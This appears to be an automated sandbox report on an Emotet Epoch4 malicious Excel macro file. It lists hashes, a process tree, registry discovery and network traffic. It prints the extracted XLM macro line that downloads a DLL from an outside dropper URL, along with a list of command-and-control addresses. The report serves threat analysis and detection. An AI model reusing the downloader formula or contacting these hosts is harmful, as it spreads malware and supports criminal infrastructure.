emotet | 894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

General

Target

?i=1hefannde.xlsm
Size

50KB
MD5

793c5a832ea9b3c4a225bc96b4449bc2
SHA1

168afc78144b659b18b606a26c3e9a6343dd104a
SHA256

894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7
SHA512

df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Score

10^/10

emotet epoch4 banker trojan

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/", "..\rulm.dll")

URLs

xlm40.dropper

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080

eck1.plain

1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----

ecs1.plain

1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2480	3996	regsvr32.exe	81

Downloads MZ/PE file

Loads dropped DLL 2 IoCs

pid	Process
2480	regsvr32.exe
3852	regsvr32.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde	regsvr32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3996	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3852	regsvr32.exe
3852	regsvr32.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE
3996	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3996 wrote to memory of 2480	3996	EXCEL.EXE	93
PID 3996 wrote to memory of 2480	3996	EXCEL.EXE	93
PID 3996 wrote to memory of 2480	3996	EXCEL.EXE	93
PID 2480 wrote to memory of 3852	2480	regsvr32.exe	100
PID 2480 wrote to memory of 3852	2480	regsvr32.exe	100
PID 2480 wrote to memory of 3852	2480	regsvr32.exe	100

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1hefannde.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3996
- C:\Windows\SysWow64\regsvr32.exe
  C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
  2⤵
  - Process spawned unexpected child process
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:3852

Network

DNS

harleyqueretaro.com

EXCEL.EXE

Remote address:

8.8.8.8:53

Request

harleyqueretaro.com

IN A

Response

harleyqueretaro.com

IN A

63.247.138.144
GET

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

EXCEL.EXE

Remote address:

63.247.138.144:80

Request

GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: harleyqueretaro.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 03 May 2022 12:01:23 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Set-Cookie: 6271199321c21=1651579283; expires=Tue, 03-May-2022 12:02:23 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 03 May 2022 12:01:23 GMT
Expires: Tue, 03 May 2022 12:01:23 GMT
Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
Content-Transfer-Encoding: binary
Content-Length: 868352
Connection: close
Content-Type: application/x-msdownload

8.238.21.126:80

322 B
7
93.184.220.29:80

322 B
7
52.178.17.2:443

322 B
7
104.110.191.140:80

322 B
7
104.110.191.140:80

322 B
7
104.110.191.140:80

322 B
7
63.247.138.144:80

http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

http

EXCEL.EXE

30.1kB
894.6kB
646
642

HTTP Request

GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

HTTP Response

200

8.8.8.8:53

harleyqueretaro.com

dns

EXCEL.EXE

65 B
81 B
1
1

DNS Request

harleyqueretaro.com

DNS Response

63.247.138.144

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\rulm.dll

Filesize
848KB

MD5
26bf9a27e1ae4680db6c0528579aa5d5

SHA1
1c606018e5dc1bd2189b88216ea82c59f72449e9

SHA256
7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

SHA512
d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

Download Submit
C:\Users\Admin\rulm.dll

Filesize
848KB

MD5
26bf9a27e1ae4680db6c0528579aa5d5

SHA1
1c606018e5dc1bd2189b88216ea82c59f72449e9

SHA256
7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

SHA512
d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

Download Submit
C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde

Filesize
848KB

MD5
26bf9a27e1ae4680db6c0528579aa5d5

SHA1
1c606018e5dc1bd2189b88216ea82c59f72449e9

SHA256
7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

SHA512
d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

Download Submit
memory/2480-140-0x0000000002401000-0x0000000002421000-memory.dmp

Filesize
128KB

Download
memory/2480-141-0x0000000002400000-0x0000000002424000-memory.dmp

Filesize
144KB

Download
memory/3852-145-0x0000000002EF0000-0x0000000002F14000-memory.dmp

Filesize
144KB

Download
memory/3996-133-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

Filesize
64KB

Download
memory/3996-136-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

Filesize
64KB

Download
memory/3996-135-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

Filesize
64KB

Download
memory/3996-134-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

Filesize
64KB

Download
memory/3996-130-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

Filesize
64KB

Download
memory/3996-132-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

Filesize
64KB

Download
memory/3996-131-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.